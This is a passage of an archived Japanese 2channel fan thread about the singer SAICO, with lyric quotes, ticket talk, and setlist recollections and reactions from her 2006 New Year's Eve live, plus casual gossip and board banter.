150 :名無しの歌姫:2006/11/25(土) 06:00:51 ID:Cu8IdaBM
思いのまま気の向くままに
レッテルを貼られようとも〜

151 :名無しの歌姫:2006/11/25(土) 11:49:45 ID:dq6aOA23
いつか 掴める はずさ
諦めてちゃ 何も 見えねえぜ

152 :名無しの歌姫:2006/11/25(土) 12:30:11 ID:PGg9CZaL
戦いはいーつもー
自分のためー


153 :名無しの歌姫:2006/11/25(土) 12:33:22 ID:dq6aOA23
アッー!

154 :名無しの歌姫:2006/11/25(土) 21:50:35 ID:vTMhH70q
チャーリーってなんです?

155 :名無しの歌姫:2006/11/25(土) 22:59:20 ID:Cu8IdaBM
チャーリー浜

・・スマソ

156 :名無しの歌姫:2006/11/26(日) 20:12:45 ID:lpQ85XIj
そうさ ちっぽけなモンさ 俺たちの悩みなんか
きっとすべてを変えられるさ〜

157 :名無しの歌姫:2006/11/26(日) 22:59:44 ID:kB6x9/08
いつか 見た 夢を この胸に ロマンを 抱き 生きて ゆくのさ

158 :名無しの歌姫:2006/11/26(日) 23:48:26 ID:yha5QrF+
大晦日ライブチケットもう売り切れたんやね。俺は買いそびれちまった。
みんな楽しんでこい!


159 :名無しの歌姫:2006/11/27(月) 00:14:20 ID:m334cYEq
この世界が色褪せてゆく
歳月が心までも変えるッー




当券出るだろ?

160 :名無しの歌姫:2006/11/27(月) 03:31:30 ID:pxncoyU2
成績で 順番競って 毎朝起きて
遅刻して 正門から見た 病院みたいな 校舎
辞書をひく 友達の影 窓から見たら
ちっぽけな ノートの隅の 革命が嫌になった

161 :名無しの歌姫:2006/11/27(月) 11:28:33 ID:m334cYEq
なんにもできなくて
なんて謝ればいいんだろ
消えていった あのこの命に

162 :名無しの歌姫:2006/11/28(火) 22:17:11 ID:zQqvn4q2
例の世話してた女の子が辞めてしまったと(ノДT )

大晦日、暇なら来い!

163 :名無しの歌姫:2006/11/28(火) 23:28:24 ID:mowbxWpp
今のサボと昔のサボどっちが可愛い?

164 :名無しの歌姫:2006/11/28(火) 23:44:24 ID:MfGrnUyI
>>163
昔→気が強そうな中に可愛らしさあり。

今→色っぽい中に可愛らしさあり。今はサイトの書き込みみて萌える。まじ可愛いwwwこういう性格とは昔はわからなかったからな。

165 :名無しの歌姫:2006/11/29(水) 07:19:12 ID:K+agstAH
昔から話し方はロリポかった。

166 :名無しの歌姫:2006/11/30(木) 07:25:35 ID:VX+NrKPe
星屑たちのうたの、間奏の台詞はかなりイイね

167 :名無しの歌姫:2006/12/01(金) 00:15:08 ID:ZRBc4N2A
やっぱ前はグレとったんかな?

168 :名無しの歌姫:2006/12/04(月) 12:50:48 ID:yKnR+yc8
大晦日は何をやってくれるんかいな?

169 :名無しの歌姫:2006/12/05(火) 12:30:45 ID:Ayr/seL5
独立戦争は良かったね!


170 :名無しの歌姫:2006/12/05(火) 22:36:23 ID:DBXiG7Me
青い地球儀回したとき〜

171 :名無しの歌姫:2006/12/05(火) 22:52:27 ID:2OITf7Jw
広い世界が狭く見えた〜♪

172 :名無しの歌姫:2006/12/06(水) 16:36:05 ID:WTTvMvZT
キミの心は遠いけど〜

173 :名無しの歌姫:2006/12/06(水) 23:43:52 ID:qSA/s7Vj
サボチンポコ丸見えだ〜

174 :名無しの歌姫:2006/12/07(木) 00:24:25 ID:Wt2+YafL
サイコって結婚しないの?

175 :名無しの歌姫:2006/12/07(木) 19:10:31 ID:6vb8vWRC
そろそろ紅白に出てもいいんじゃない?

176 :名無しの歌姫:2006/12/07(木) 22:43:42 ID:870UbMFP
トップページの写真よい! よすぎるんだけど。

177 :名無しの歌姫:2006/12/08(金) 02:47:48 ID:i8oBBRn/
>>175
うん、大御所としてね。たつおさんも呼んでほしいな。


178 :名無しの歌姫:2006/12/08(金) 20:03:39 ID:TxVMD3bJ
大晦日の予定が空白になってしもうた・・・otL
ということで大晦日ライブ、当日券買って参戦するのでみんなヨロシク!

179 :名無しの歌姫:2006/12/09(土) 05:25:02 ID:pyuprGj8
当日券でるのか?俺も行くぞ!


180 :名無しの歌姫:2006/12/10(日) 21:27:04 ID:cF8XHKra
過去のシングル&ヒット曲なら行くのに
それにカウントダウンじゃないのか

181 :名無しの歌姫:2006/12/10(日) 21:34:07 ID:da2xgXna
チケ届いてたんで今日、特急券とのぞみの指定席予約しといた
とりあえず東京見物がてらいてくるお
馴れ合うつもりないんでおわたらとっとと帰るが

182 :名無しの歌姫:2006/12/10(日) 22:32:43 ID:evIPDNxT
>>180気が合うかもと思って作ってみた(ビクター時代限定になるがw)

01.黄金時代
02.それぞれの探しもの
03.GOAL
04.プールサイド
05.恋ってさ
06.夜空の虹
07.O.K.
08.ピアノシモのように
09.春夏秋冬
10.遠い夜明け
11.葛藤
12.HELP
13.導火線に火をつけろ!
14.24の誓い
15.情熱
16.あの素晴しい愛をもう一度
17.風に吹かれて
18.In The Rain
19.独立戦争
En1.心からありがとう
En2.希望の鐘
年越しにあまりヘビーな曲は聴きたくないからこんなリストキボンヌ

183 :名無しの歌姫:2006/12/10(日) 22:50:01 ID:vOv7+07j
年越しにこれはきついw


184 :名無しの歌姫:2006/12/10(日) 23:04:34 ID:tewM4fbL
当日券出ないハズがないだろ〜

行ってみたら入れませんでした、なんてことは許されない

185 :名無しの歌姫:2006/12/10(日) 23:22:09 ID:3YiTESqA
>>184
入れない可能性大だろ(^ω^;)

186 :名無しの歌姫:2006/12/11(月) 00:21:19 ID:Q27Hdbgz
>>185
入れる可能性大だろ(^ω^;)


187 :名無しの歌姫:2006/12/11(月) 01:51:22 ID:/j3ZBpEN
>>182
ビクター時代限定でVOICEや長い放課後の様な
神曲が入ってないのは何故w

188 :名無しの歌姫:2006/12/12(火) 22:53:18 ID:QVXna16Q
(゚Д゚ )ムハァ

189 :名無しの歌姫:2006/12/13(水) 08:18:30 ID:nzThtJ1r
( ゚Д゚)ムハァ

190 :名無しの歌姫:2006/12/14(木) 14:57:39 ID:znJ2Q0sq
あと2週間ちょっとだぜ〜

191 :名無しの歌姫:2006/12/14(木) 18:17:08 ID:7k3D9dWp
毎年違う街でやって欲しいよ。南国からじゃ東京はちょっと遠いから

192 :名無しの歌姫:2006/12/14(木) 18:37:55 ID:I0TugsML
>>191
それくらい行けよw国内だぞ。海外じゃないし、一年に一回の気持で特別な時間を過せると思えば余裕。
国内だぞ。日本だぞ。

193 :名無しの歌姫:2006/12/14(木) 18:47:13 ID:znJ2Q0sq
ってゆーか

毎年やるのか?(´・∀・)

194 :名無しの歌姫:2006/12/15(金) 03:08:41 ID:tYSZ77Ra
やってほしいお

とりあえず年末は東京見物がてら逝くつもり

195 :名無しの歌姫:2006/12/15(金) 04:03:19 ID:r/Jd0q5G
>>193
ここ三年間は・・毎年か?今年は全国まわったな。名古屋、大阪、広島、東京だっけ?(´・∀・`)

196 :名無しの歌姫:2006/12/16(土) 05:43:28 ID:7LzLXoFl
>>195
全公演で弦が切れたそうで藁

思えば
あの直後にfanになった
あれからずっとサボにあいたいと思ってた

197 :名無しの歌姫:2006/12/16(土) 09:31:12 ID:FUEvAnn2
いや、大阪だけ切れなかったん違う?忘れた。サボを近くで見れて幸せだよね。
最高。

198 :名無しの歌姫:2006/12/17(日) 06:55:54 ID:rijhkuhc
やっぱりシメは希望の鐘かな?

199 :名無しの歌姫:2006/12/17(日) 19:16:43 ID:iJ/P4M+3
希望の鐘ナマで聞きたいです。これを新しい日本の国歌にすればいいのに。

200 :名無しの歌姫:2006/12/18(月) 16:50:43 ID:UluUm1Ji
シメはやっぱり独立戦争がいいな

201 :名無しの歌姫:2006/12/18(月) 23:29:38 ID:SRSPz8zn
ラストはリズムがいいなぁ〜

202 :名無しの歌姫:2006/12/19(火) 20:22:45 ID:DoUo/Ivp
カ、カードが届いたんだな(;´益`)=З

203 :名無しの歌姫:2006/12/21(木) 06:28:35 ID:VjcKietk
X'masカード届いたお
サボありがとー(≧∀≦)
けど、喪中なのかあ

204 :名無しの歌姫:2006/12/21(木) 14:09:11 ID:2CfaJMBF
弱そうなサンタだな

205 :名無しの歌姫:2006/12/21(木) 18:23:39 ID:Wwp+2Jgk
見たい(>_<)

206 :名無しの歌姫:2006/12/21(木) 22:32:35 ID:YtcZi83n
誰か見せて!(>_<)

207 :名無しの歌姫:2006/12/22(金) 08:48:15 ID:DXQHKn4E
>>205-206
当日、誰かが持ってきよるやろ

208 :名無しの歌姫:2006/12/22(金) 23:55:39 ID:dJF9zAHa
>>207
イェーイィィィィ!

209 :名無しの歌姫:2006/12/23(土) 22:36:44 ID:B6qATv+Z
>>207のIDが代プロXみたいで嫌

210 :名無しの歌姫:2006/12/24(日) 17:42:13 ID:yDHvXz1e
おまいら、Merry Christmas!!

賛否両論もあろうがうpしとくよ
http://imepita.jp/20061224/628270

211 :名無しの歌姫:2006/12/24(日) 19:47:01 ID:KX5FRabN
>>210
彼女いないおれが今日、唯一和んだ。ありがとう。

212 :名無しの歌姫:2006/12/26(火) 23:08:51 ID:XS/SUHJW
>>210
和ませてもらったよ。ありがとう。
私も今年は一人寂しいクリスマスでした。毎年だからいいけど。

213 :名無しの歌姫:2006/12/26(火) 23:35:32 ID:B766+Ohb
>>212
毎年とか言うなよ。・゚・(ノД`)・゚・。




214 :SAICOさん@お腹いっぱい:2006/12/27(水) 04:29:52 ID:cbNYLBKu
自分も今年も独りだったな
延々と2ちゃんにいすわってた



215 :名無しの歌姫:2006/12/27(水) 09:12:40 ID:06jVB0XD
>>211-214
(・∀・)ひとりぼっちじゃナーイ

216 :名無しの歌姫:2006/12/27(水) 16:57:26 ID:uSb1Aw0k
希望への鐘をうち鳴らせ!

217 :名無しさん@お腹いっぱい:2006/12/27(水) 17:27:37 ID:cbNYLBKu
こないだ※BBCでRADIOHEADのアコースティックライウ゛やってたが気付くとセトリ全部知ってる自分がいた
トム.ヨーク萌え〜(´д`;

218 :SAICOさん@お腹いっぱい:2006/12/28(木) 04:37:22 ID:wlSIMtL9
だけどここには愛がある

219 :名無しの歌姫:2006/12/28(木) 16:15:06 ID:9CcjeV1A
おぉ〜ついに2ちゃんねるにsaicoが舞い降りた!!

220 :メンヘラ@副本部長:2006/12/29(金) 07:54:42 ID:iIgg3l+t
ちがうだろ

221 :名無しの歌姫:2006/12/29(金) 10:40:50 ID:uyC0yo1p
いよいよあさってになりました。

222 :名無しの歌姫:2006/12/29(金) 11:48:34 ID:F+Kglwj8
いいな。報告楽しみに待ってます。

223 :名無しの歌姫:2006/12/29(金) 16:01:46 ID:iIgg3l+t
やべっ禁鳥してきた

224 :名無しの歌姫:2006/12/30(土) 15:55:40 ID:wY+GUdfv
いよいよ明日になりましたな。

225 :名無しの歌姫:2006/12/30(土) 21:25:34 ID:7/RpSzxW
>>真っ白な骨になるその日まで

決意が篭ったいい言葉やね
最後にBOROBOROになる日まで精一杯歌にかけて
いったらいいと思うよ

サボ、明日のライヴ楽しみにしてるよ
自分達もサボの事精一杯応援してるからね(*゚ー^)p

226 :名無しの歌姫:2006/12/31(日) 01:33:44 ID:nbPQBxd1
とうとう今日になりましただ

227 :名無しの歌姫:2006/12/31(日) 04:40:59 ID:he3bNCxG
サボ、みんな、楽しんで(☆ゝω・)Ъ

228 :名無しの歌姫:2006/12/31(日) 12:50:28 ID:f3PRyim/
只今移動中
生サボ初体験、なんか緊張するわ


229 :名無しの歌姫:2006/12/31(日) 13:46:18 ID:oIdnWiK8
当日券、そこでおとなしく待ってろよ(笑)

230 :名無しの歌姫:2006/12/31(日) 16:13:31 ID:Iv4KvWiE
今から江古田向けて出発します!
何歌うんだろう??楽しみ。

231 :名無しの歌姫:2006/12/31(日) 18:33:01 ID:f3PRyim/
今ついた
チケ全てソールドアウトみたいやな

232 :行って来たー!!:2006/12/31(日) 22:10:32 ID:nbPQBxd1
初めて生で見ました。キレイな人だと思った。

「ループ」の時一緒に「い・ま・ならばー」と歌いたかったけど、涙ウルウルで喉が詰まって声が出なかった。
8年前、フリーターやってた時にこの歌を何回も聞いていた頃を思い出した。

233 :名無しの歌姫:2006/12/31(日) 23:36:16 ID:f3PRyim/
最高!の夜でした
サボのライブ初めてだったけどサボ可愛かった
大槻君と民族君無茶上手い!
ノリも凄げー良かったし
SMOKE演ってくれたの嬉しかった


234 : 【1110円】 【小吉】 :2007/01/01(月) 01:11:55 ID:746ofYgx
あけおめ!
今、一人ぼっちと思っている人も
きっと良い一年になるよぉに。

235 :名無しの歌姫:2007/01/01(月) 13:21:00 ID:1am22kFN
一人ぼっち上等



236 :名無しの歌姫:2007/01/01(月) 13:27:07 ID:5SfTu7jL
一人嫌だ

237 :名無しの歌姫:2007/01/01(月) 13:58:42 ID:1am22kFN
話違うけど、システム手帳
loftいったら山の様に売られてたよね
そこまで足伸ばせなかったのかな

サボが選んだお正月グッズ
テラウラヤマシス


238 :名無しの歌姫:2007/01/01(月) 22:21:21 ID:QTYydKg6
俺は三太君が欲しかったなぁ。

239 :名無しの歌姫:2007/01/02(火) 07:19:12 ID:kIGdjbkG
サボ製の三田クソは貴重やったな
思ったより大きくて驚いた

つか漏れはサボが欲し..(ry

240 :名無しの歌姫:2007/01/02(火) 10:28:00 ID:EKPOFS7h
風の旅人のやつ完全に立ち直れないように引退さしてやった 喜べ これからは絢香の時代だ!

241 :名無しの歌姫:2007/01/03(水) 09:54:24 ID:BJ7uMGyr
240のやつ!くだらねぇことかいてんじゃねーよ!タコ!



242 :名無しの歌姫:2007/01/03(水) 10:43:16 ID:q1y109Uk
絢香、可愛いけどサボのが10倍は上

243 :名無しの歌姫:2007/01/03(水) 11:06:55 ID:8ElcbvEf
風の旅人?絢香って?しゅんか? 春夏秋冬しかしらんな

244 :名無しの歌姫:2007/01/03(水) 18:54:24 ID:q1y109Uk
絢香=あやか、だよな
こないだMステで初めてみた


つか年末ライブのセトリうpしてくれる神キボン

245 :名無しの歌姫:2007/01/03(水) 22:58:20 ID:YqIYCIru
サボ、何唄った?

246 :名無しの歌姫:2007/01/04(木) 22:22:54 ID:GHSnXi5L
正確に覚えてないんだけど・・・

・導火線に火をつけろ!
・DANGER
・石ころ
・迷子の子猫
・ループ
・あの素晴らしい愛をもう一度
・SMOKE
・COLOR
・CERIAL

あともう1曲ありましたが、すみません曲名が分かりません。「ここまで来たんじゃないか〜」
というフレーズが入る曲です。

うーんこんなに少なかったけなぁ?もっとあったはずだなぁ。
どなたか補足お願いします。


247 ::2007/01/05(金) 00:40:02 ID:nORfALss
風に吹かれて

248 :名無しの歌姫:2007/01/05(金) 00:47:44 ID:OL39UkiZ
素の状態でのライブ参戦だったんで知らない曲も多かったけど
「風に吹かれて」と「怪物」前半で演ってくれてた、「SMOKE」も前半で
演ってた筈
後、中頃に「MOTHER」があったけど、何かもっと、20曲位歌ってた印象ある
んだけど・・・

アンコール曲、「COLOUR」と「CEREAL」でおk?

正直、サボの美しさに見惚れてしまっててセトリ飛んでしまった(*´∀`;

249 :名無しの歌姫:2007/01/05(金) 01:12:56 ID:Z2LXX2v5
246です。すみません「DANGER」ではなく「怪物」だったようです。
それと曲名も「風に吹かれて」でしたね。ありがとうございます。

250 :名無しの歌姫:2007/01/05(金) 02:02:11 ID:OL39UkiZ
いえいえ、自分もサボ初心者なので謝られると心苦しいです

むしろ思い出したいのに思い出せない夢の中の出来事の様ですね

251 :名無しの歌姫:2007/01/05(金) 02:19:13 ID:Z2LXX2v5
そうなんです。涙ウルウルしているうちに気づいたら終わってしまったという感じ。
時間にして90分くらいだったと思うけど、あっという間だった。

252 :名無しの歌姫:2007/01/05(金) 09:10:49 ID:33syACHU
ぐは。怪物唄ったのか・・。ギザウラヤマス(´・ω・`)

253 :名無しの歌姫:2007/01/05(金) 12:37:47 ID:HwQHqesX
サボの事が神がかってみえた
サボのためだったらしんでもいいとおもった

254 :名無しの歌姫:2007/01/05(金) 22:44:11 ID:Z2LXX2v5
三太君欲しかった。ほんとーに欲しかった。

255 :SAICOさん@お腹いっぱい:2007/01/06(土) 03:55:39 ID:MRkfkHQ9
「サイコ ライブ 江古田」、で検索してると
オープニングアクトで歌ってたEima嬢のブログがかかった↓
http://eima.at.webry.info/200701/article_1.html

なんか変に嬉しくなってコメント残しておいた藁

256 :名無しの歌姫:2007/01/06(土) 17:01:08 ID:Or5HFFuv
サボのワンマンの時だけはオープニングアクトいらない。
オープニングアクトで20分くらい聞いているよりだったら、サボの歌を4曲ぐらい聞けるじゃん。

257 :名無しの歌姫:2007/01/06(土) 17:04:28 ID:Or5HFFuv
独立戦争をナゼ封印したの。なぜマザーばかり絶対歌うん?

258 :名無しの歌姫:2007/01/06(土) 19:04:19 ID:vD3hZLGX
そりゃあーた。いつまでも過去にしがみつくのもどうかと。
サボだって新しい歌を唄いたいでしょ。

259 :名無しの歌姫:2007/01/06(土) 23:45:13 ID:Q5uselub
Motherは神曲

260 :名無しの歌姫:2007/01/06(土) 23:51:13 ID:EqobmoZw
大晦日に聞いた「Mother」はサビの部分のアルペジオがメチャクチャ美しくて
神々しかった。

261 :名無しの歌姫:2007/01/07(日) 07:11:49 ID:rbvC1IyF
大槻君は神

262 :名無しの歌姫:2007/01/07(日) 11:02:13 ID:bhnlbtNV
シングルMOTHERのジャケットシール貼りは、大森洋平のシングル3枚と同じ思考。
やっぱり2人は付き合っていたのですね


263 :名無しの歌姫:2007/01/07(日) 22:20:35 ID:tPUycaHD
誰か一緒にいたとこ見た事あるんかな?今も付きあってるん?大森なんたらと

264 :名無しの歌姫:2007/01/08(月) 14:35:02 ID:axI2Ug7Z
>>315
サボ!

265 :名無しの歌姫:2007/01/11(木) 01:34:54 ID:99c9Ggw1
この人けっこんするんだろうか。美人なのに勿体ないいい人いるはずなのに

266 :名無しの歌姫:2007/01/11(木) 22:51:50 ID:BdQjbh4g
正直、もしサボが結婚とかしたらショックで寝込むだろうな

267 :名無しの歌姫:2007/01/16(火) 13:51:56 ID:RxVSqGoV
恋愛の話題があるのはファンとして喜ばしいことだし早くライブで結婚報告してくれるとファンも安心するんだけど

268 :名無しの歌姫:2007/01/18(木) 21:40:59 ID:gAXy0cA+
今はアルバム製作とかで忙しいし、恋愛なんて、めんどくさい。
肩凝っちゃうよね。それでなくても、私ってホラ、すっごい巨ny(ry

269 :名無しの歌姫:2007/01/18(木) 22:30:19 ID:OYGzgldy
>>268
女神さま、写メうp禿キボヌ(;´Д`)ハァハァ

270 :名無しの歌姫:2007/01/19(金) 02:41:14 ID:wkNRYnyz
メガマック欲しさに毎日マクドに通うサボ激萌え〜(;´益`)=З

271 :名無しの歌姫:2007/01/20(土) 18:59:50 ID:Zm9Fwf8i
「サイコ」ようやくゲット出来ましたアゲ

272 :名無しの歌姫:2007/01/20(土) 19:27:29 ID:H3NtG3RL
>>271
感想は?

273 :名無しの歌姫:2007/01/25(木) 11:49:47 ID:XuJ1X4pd
やっと巡り合えたんだね…(´・∀・)

メガマック食って変身した“メガ彩子”に、今後も大いに期待したろ(;´益`)=З

274 :名無しの歌姫:2007/01/25(木) 23:10:19 ID:6eJEryhL
やっと巡り逢えたのか
つか何を気体するのか分からんが藁


とりあえず逝ってくる

275 :彩子さんの歌ここがいい:2007/02/04(日) 11:04:30 ID:01TWJ9hA
「Valentine」てなんでバレンタインなんだろうか? 解釈できた人がいたら教えて下さい。

それはともかくこの歌の鬱なところがすごくいい。「むなしい挫折をくぐる」なんて、
挫折をくぐり抜けても意味はなかったのかい・・・。むなしい挫折に何発も
ボコボコにされた事がある人にとってはたまらない言葉だなぁ。「苦労した甲斐が
あった」といいたいけど、振り返ってみると打ちのめされただけだったことも
けっこうあったなぁ。

激しく落ち込んだ時は回りの励ましの声さえもうっとおしいが、この歌は
素直に聞ける。

276 :名無しの歌姫:2007/02/07(水) 23:24:02 ID:7ff4UHgN
東北出身なのに、冬は苦手なんだね(゚Д゚ )ムハァ

277 :名無しの歌姫:2007/02/08(木) 22:16:07 ID:nRj3B1lr
saicoの一言一言に萌えるんだね。(゚Д゚ )ムハハァ

278 :名無しの歌姫:2007/02/09(金) 00:52:55 ID:0x339t3u
2月8日の日記、なんとなく湾岸ミッドナイト思い出した。

279 :名無しの歌姫:2007/02/10(土) 22:04:32 ID:SDqx+sEw
>>278
禿同w自分も思った、つーかサボアレ絶対意識してるよー藁

それよか2/9の写真、ちょー可愛い。(゚Д゚ )ムハハァ

280 :名無しの歌姫:2007/02/11(日) 01:27:28 ID:dThAWEqR
1/25の写真もステキ・かわいい。
クリックしたら大きくなるようになってほしい。

281 :名無しの歌姫:2007/02/15(木) 11:51:31 ID:/GNE8Suk
おまいら、ここで(゚Д゚ )ムハァすんのやめれ






( ゚Д゚ )ムハァ

282 :名無しの歌姫:2007/02/15(木) 18:12:18 ID:8ylfbv80
どこでムハァすればいいんだ( ゚Д゚)ゴルァ !
サイコタン・・・ムハァ

283 :名無しの歌姫@(゚Д゚ )ムハァは野球板で:2007/02/18(日) 19:54:16 ID:U7nliF49
次のアルバム製作は進んでんのかいな?

284 :SAICOサソ@お腹いっぱい:2007/02/19(月) 00:16:35 ID:mt5c7qqS
本人マターリ進めてくれてるみたいだから気長に待ちましょうよ


NEW Albumリリースしたらツアーとかやってくれるかな、
又、サボにあいたい


50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)